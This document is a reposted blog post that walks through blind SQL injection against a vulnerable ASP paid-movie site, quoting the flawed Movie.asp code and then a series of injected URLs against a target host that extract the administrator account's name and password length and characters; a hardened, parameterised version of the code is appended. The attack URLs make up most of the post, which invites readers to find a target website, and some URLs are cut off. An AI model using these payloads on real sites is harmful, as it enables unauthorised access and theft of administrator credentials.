A simple intrusion into a paid movie website

xiaoxiao, 2021-03-06

Today, while browsing online, I found a post about how to break into a paid movie website. In fact, the program is very simple. It is written in ASP, and I believe friends who have learned ASP will understand it. The content of the post is as follows:

Recently I have been learning SQL injection. I downloaded the Jinmei Charge Movie 2003 Member Edition, read through it, and found that Movie.asp has a problem:

    Dim SQL
    Dim RS
    ' ID is taken from the request and used without any check
    ArticleID = Request("ID")
    Set RS = Server.CreateObject("ADODB.Recordset")
    ' The request value is concatenated directly into both statements
    SQL = "Update Learning Set Hits = Hits + 1 Where ArticleID = " & ArticleID
    RS.Open SQL, Conn, 1, 3
    SQL = "Select * From Learning Where ArticleID = " & ArticleID
    RS.Open SQL, Conn, 1, 1
    Title = RS("Title")
    ItType = RS("TypeID")

There is no check of the variable at all, so don't blame me, heh. Find a target website and we start by testing the length of the administrator account. Because the field that stores the administrator account is named name, the statement is:

    http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>4)

The page returns normally. From this we know that the administrator's account is longer than 4 characters! We continue:

    http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>

"Unable to display a web page", an error, from which we know that the administrator's account is greater than or equal to 8 characters.

    http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)=8)

The page returns normally, so name is 8 characters.

    http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(pwd)=21)

The page returns normally: pwd is 21 characters. Damn, that's long! Now we start testing the user name:

    http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>50)

The page returns normally; it seems 50 is not big enough.

Note: the MID function can split the password into parts. Usage: MID(string, start position, number of characters to take).

    http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>100)

"Unable to display the page", so it seems to be smaller than 100.

    http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))=
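One way to close the hole in the Movie.asp code shown above, as an added example that is not part of the original post or of the product's code: the id is validated as a plain integer and then bound as a typed ADO parameter, so the SQL text never contains request data. It assumes conn is the open ADODB.Connection the original code uses; the helper names IsPlainInteger and NewIdCommand are hypothetical.

```vbscript
' Added example: hardened form of the Movie.asp lookup (not the product's code).
' Assumes conn is the already-open ADODB.Connection used by the original page.
Const adInteger = 3             ' ADO DataTypeEnum
Const adParamInput = 1          ' ADO ParameterDirectionEnum
Const adCmdText = 1             ' ADO CommandTypeEnum
Const adExecuteNoRecords = 128  ' ADO ExecuteOptionEnum

' Hypothetical helper: True only for 1 to 9 decimal digits. IsNumeric is not
' used because it also accepts values such as "1e5", "&H10" or "$1".
Function IsPlainInteger(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"   ' at most 9 digits, so CLng cannot overflow
    IsPlainInteger = re.Test(s)
End Function

' Hypothetical helper: builds a command whose only "?" is bound to an integer.
Function NewIdCommand(sql, id)
    Dim c
    Set c = Server.CreateObject("ADODB.Command")
    Set c.ActiveConnection = conn
    c.CommandType = adCmdText
    c.CommandText = sql
    c.Parameters.Append c.CreateParameter("id", adInteger, adParamInput, , id)
    Set NewIdCommand = c
End Function

Dim rawId, articleId, cmd, rs, title, ittype
' Read only the query string; Request("ID") would also search forms and cookies.
rawId = Trim(Request.QueryString("id"))
If Not IsPlainInteger(rawId) Then
    ' A value such as "330 and 1=(select ...)" is rejected here.
    Response.Status = "400 Bad Request"
    Response.End
End If
articleId = CLng(rawId)

' The SQL text is constant; the id travels separately as a typed parameter.
Set cmd = NewIdCommand("UPDATE learning SET hits = hits + 1 WHERE articleid = ?", articleId)
cmd.Execute , , adExecuteNoRecords

Set cmd = NewIdCommand("SELECT * FROM learning WHERE articleid = ?", articleId)
Set rs = cmd.Execute
If rs.EOF Then
    Response.Status = "404 Not Found"
    Response.End
End If
title = rs("title")
ittype = rs("typeid")
```

Either measure alone stops the length and character probes shown above; using both keeps the page safe if one of them is later removed during maintenance.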

When reposting, please cite the original URL: https://www.9cbs.com/read-93466.html
